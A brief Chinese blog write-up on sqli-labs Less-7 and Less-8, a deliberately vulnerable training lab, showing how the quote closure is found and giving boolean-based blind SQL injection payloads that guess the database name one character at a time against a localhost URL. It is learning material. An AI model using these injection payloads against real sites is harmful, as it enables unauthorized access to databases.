Less-7,8【报错+BOOL类型】
输入其他符号,id=1 ?"?" 网页正常回显,输入' 时,系统报错,证明闭合符号为 '
接着用 and 1=1 进行测试
在爆破过程中发现最后等于的值只能为数字,只能进行数字间比较
-
直接爆破
http://127.0.0.1/sqli-labs-master/less-7/
?id=1' and if((database()='security'),1,0)='1--+
-
单个字符爆破
http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27%20and%20if(substr(database(),1,1)=%27s%27,1,0)=%271--+
第八题与第七题解法一样,查看源码差距为一个()
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步